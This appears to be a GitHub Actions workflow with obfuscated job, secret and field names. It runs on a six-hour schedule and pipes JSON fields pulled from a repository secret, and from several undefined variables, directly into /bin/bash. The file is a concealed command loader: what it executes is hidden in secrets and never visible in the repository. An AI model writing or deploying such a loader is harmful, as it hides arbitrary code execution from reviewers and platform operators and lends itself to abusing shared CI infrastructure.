name: shisuanjian3489

on:
  workflow_dispatch:
  schedule:
    - cron: '4 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shisuanjian3489
        env:
          o4215: ${{ secrets.o4215 }}
        run: |
          echo $o4215 | jq -r .ag040 | /bin/bash
          echo $thkyk77161 | jq -r .rkwg8990 | /bin/bash
          echo $ur94127 | jq -r .uy7 | /bin/bash
          echo $hi946 | jq -r .xsxed8657 | /bin/bash

